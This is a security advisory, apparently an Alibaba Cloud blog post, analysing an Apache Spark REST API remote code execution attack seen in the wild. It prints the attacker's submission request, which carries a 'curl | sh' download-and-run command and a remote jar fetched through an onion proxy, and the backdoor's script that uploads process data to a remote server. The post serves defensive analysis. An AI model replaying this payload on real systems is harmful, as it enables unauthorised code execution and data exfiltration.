Alibaba Cloud Security Team Discovers Apache Spark Rest API Remote Code Execution (RCE) Exploit

Impact of the Exploit

Details of the Exploit

  1. In the first step, the attacker discovers a Spark server with web UI service exposed on the web through mass scanning.
  2. The attacker sends the following request to the Spark server’s REST API through port 6066. The attack payload instructs the server to remotely download SimpleApp.jar from a dark web location using onion.plus for subsequent stages, hiding behind .onion proxy routing.
  • POST /v1/submissions/create host:x.x.x.x:6066 { "action": "CreateSubmissionRequest", "clientSparkVersion": "2.1.0", "appArgs": [ "curl x.x.x.x/y.sh|sh" ], "appResource": "https://xxxx.onion.plus/SimpleApp.jar", "environmentVariables": { "SPARK_ENV_LOADED": "1" }, "mainClass": "SimpleApp", "sparkProperties": { "spark.jars": "https://xxxxxxxx.onion.plus/SimpleApp.jar", "spark.driver.supervise": "false", "spark.app.name": "SimpleApp", "spark.eventLog.enabled": "false", "spark.submit.deployMode": "cluster", "spark.master": "spark://x.x.x.x:6066" } }
  1. Please note that this is the first time that TOR “dark web” is used to spread this type of backdoor. According to security experts in Alibaba, this sort of approach will increase in the near future. In our estimation, about 5,000 Spark servers accessible on the web can be potentially exploited using this vulnerability.
  2. Reverse engineering analysis shows that the jar package is a backdoor program that downloads a shell script through onion routing and then executes it.
  1. The content of the shell script is as follows:
  • #!/bin/bash ps ax --sort=-pcpu > /tmp/tmp.txt curl -F "file=@/tmp/tmp.txt" http://x.x.x.x/re.php rm -rf /tmp/tmp.txt
  1. This script only gathers and transmits performance information of a victim machine, without taking any further action, apparently giving the attackers on-the-ground intelligence to plan next steps, by taking the estimated power of a cluster into consideration.

Further Discussions

Suggestions for Remediation of Vulnerability

Further Reading

  1. Apache Spark Security Configuration: http://spark.apache.org/docs/latest/configuration.html#security
  2. Hadoop Yarn RCE Vulnerability: (Article in Chinese) https://www.toutiao.com/i6552678121449980423

--

--

--

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The British Airways Hack: JavaScript Weakness Pin-pointed Through Time-lining

CryptoNation’s Successful AMA Session with GemGuardian CMO

Quantum Robust Hash-based Signatures

Vertical and Horizontal Forms of Privilege Escalation

Encrypted Word Searches Using Golang and Kryptology

What Protects Your Privacy Like No Other Method? … AES

Gang Stalking Methods

Prosper presale guide and community airdrop

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Alibaba Cloud

Alibaba Cloud

Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com

More from Medium

ROSETTA ERROR in starting Kafka Zookeeper on MAC M1

Apache Kafka’s 3 Main Functions

Kafka — Everything you need to know